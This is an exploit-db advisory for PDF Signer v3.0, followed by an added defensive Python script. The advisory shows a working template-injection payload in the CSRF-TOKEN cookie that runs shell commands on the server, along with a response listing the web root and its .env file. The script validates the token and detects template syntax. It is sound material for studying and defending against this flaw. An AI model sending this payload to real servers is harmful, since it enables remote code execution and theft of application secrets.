PDF Signer 3.0 – Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)

  • Author: dd_
    Date: 2019-01-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46276/
  • # Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
    # Dork: N/A
    # Date: 2019-01-28
    # Exploit Author: dd_ (info@malicious.group)
    # Vendor Homepage: https://codecanyon.net/user/simcy_creative
    # Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707
    # Version: v3.0
    # Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
    # Vendor Banner: Signer v3.0 – Create Digital signatures and Sign PDF documents
    # Research IRC: irc.blackcatz.org #blackcatz
    
    # Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation.
    
    # POC:
    # 1)
    
    GET / HTTP/1.1
    Host: signer.local
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Referer: http://signer.local/signin/?secure=true
    Connection: close
    Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
    Upgrade-Insecure-Requests: 1
    
    # Example
    
    [REQUEST]
    
    GET / HTTP/1.1
    Host: signer.local
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Referer: http://signer.local/signin/?secure=true
    Connection: close
    Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
    Upgrade-Insecure-Requests: 1
    
    [RESPONSE]
    
    --- half way down page --- snip ---
    
    <label>Folder name</label>
    <input type="text" class="form-control" name="foldername" placeholder="Folder name" data-parsley-required="true">
    <input type="hidden" name="folder" value="1">
    <input type="hidden" name="folderid">
    <input type="hidden" name="csrf-token" value="rnqvttotal 112K
    drwxr-xr-x  9 www-data www-data 4.0K Jan 28 12:04 .
    drwxr-xr-x  6 www-data www-data 4.0K Jan 28 06:19 ..
    -rw-r--r--  1 www-data www-data 1.1K Jan 28 12:03 .env
    -rw-r--r--  1 www-data www-data  532 Jan  9 20:52 .htaccess
    drwxr-xr-x  9 www-data www-data 4.0K Jan  9 20:53 assets
    -rw-r--r--  1 www-data www-data  947 Jan  9 20:52 composer.json
    -rw-r--r--  1 www-data www-data  54K Jan  9 20:52 composer.lock
    drwxr-xr-x  2 www-data www-data 4.0K Jan 28 11:59 config
    -rw-r--r--  1 www-data www-data 1.7K Jan  9 20:52 cron.php
    -rw-r--r--  1 www-data www-data  169 Jan  9 20:52 index.php
    drwxr-xr-x  3 www-data www-data 4.0K Jan  9 20:53 lang
    drwxr-xr-x  6 www-data www-data 4.0K Jan 28 11:46 src
    drwxr-xr-x  9 www-data www-data 4.0K Jan  9 20:53 uploads
    drwxr-xr-x 24 www-data www-data 4.0K Jan  9 20:53 vendor
    drwxr-xr-x  6 www-data www-data 4.0K Jan  9 20:53 views
    to5gw" />
    </div>
    </div>
    </div>
    
    --- snip ---
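The root cause the advisory shows is that the application takes the CSRF-TOKEN cookie value and reflects it back through a template renderer, so `{{...}}` inside the cookie is evaluated as code instead of being treated as an opaque string. The script below is an added defensive example, not code from the advisory or from the Signer product. It parses the Cookie header without interpreting values, accepts a CSRF token only if it has the shape of a token the server issued and equals the session copy in a constant-time comparison, and flags template delimiters in the token as an SSTI indicator for logging or alerting. The token pattern, the session token and the two sample requests are constructed assumptions for this example; the second request mirrors the POC cookie above.

```python
"""Added defensive example (not part of the exploit-db advisory or the Signer
product): validate a CSRF-token cookie as an opaque value and flag template
syntax in it, instead of ever passing it to a template engine."""

import hmac
import re

# Shape of a token this example's server issues: lowercase alphanumeric,
# 10..64 characters. This is an assumption for the example; the advisory's
# surrounding token text ("rnqvt" ... "to5gw") fits it.
TOKEN_RE = re.compile(r"^[a-z0-9]{10,64}$")

# Delimiters of common template/expression syntaxes. Any of these inside a
# value that should be an opaque token is a strong SSTI-attempt indicator.
TEMPLATE_MARKERS = ("{{", "}}", "{%", "%}", "${", "<?")

# Constructed session token and sample requests (assumptions for this example).
SESSION_TOKEN = "rnqvtk3m9x2bto5gw"

BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: signer.local\r\n"
    "Cookie: CSRF-TOKEN=rnqvtk3m9x2bto5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl\r\n"
    "Connection: close\r\n"
)

# Mirrors the advisory's POC cookie so the detector can be exercised offline.
MALICIOUS_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: signer.local\r\n"
    "Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; "
    "simcify=uv82sg0jj2oqa0kkr2virls4dl\r\n"
    "Connection: close\r\n"
)


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header into name -> value pairs.

    Values are kept verbatim: nothing here decodes, interprets or renders them.
    Splitting on the first '=' keeps '=' characters inside a value intact."""
    cookies = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, value = part.split("=", 1)
        cookies[name.strip()] = value.strip()
    return cookies


def find_template_markers(value: str) -> list:
    """Return the template delimiters present in value, in a fixed order."""
    return [marker for marker in TEMPLATE_MARKERS if marker in value]


def csrf_token_is_valid(presented: str, expected: str) -> bool:
    """Accept the token only if it has the issued shape and equals the session copy.

    The shape check rejects anything containing template syntax before the
    value reaches any rendering code; hmac.compare_digest makes the equality
    check constant-time so the token cannot be guessed byte by byte."""
    if not TOKEN_RE.fullmatch(presented):
        return False
    return hmac.compare_digest(presented.encode(), expected.encode())


def audit_request(raw_request: str, session_token: str) -> dict:
    """Inspect one raw HTTP request and report on its CSRF-TOKEN cookie."""
    cookie_header = ""
    for line in raw_request.splitlines():
        if line.lower().startswith("cookie:"):
            cookie_header = line.split(":", 1)[1].strip()
            break
    token = parse_cookie_header(cookie_header).get("CSRF-TOKEN", "")
    markers = find_template_markers(token)
    return {
        "token_valid": csrf_token_is_valid(token, session_token),
        "template_markers": markers,
        # Alert on template syntax regardless of whether the token also failed
        # validation: a failed token is noise, template syntax is an attack.
        "alert": bool(markers),
    }


if __name__ == "__main__":
    for label, request in (("benign", BENIGN_REQUEST), ("poc", MALICIOUS_REQUEST)):
        print(label, audit_request(request, SESSION_TOKEN))
```

The fix this models is two-fold: the token is only ever compared, never written into a template, and the comparison happens after a strict format check so that a value like the POC's is rejected and logged before any rendering code sees it. Emitting `template_markers` in the audit record gives a simple field to alert on in a WAF or SIEM.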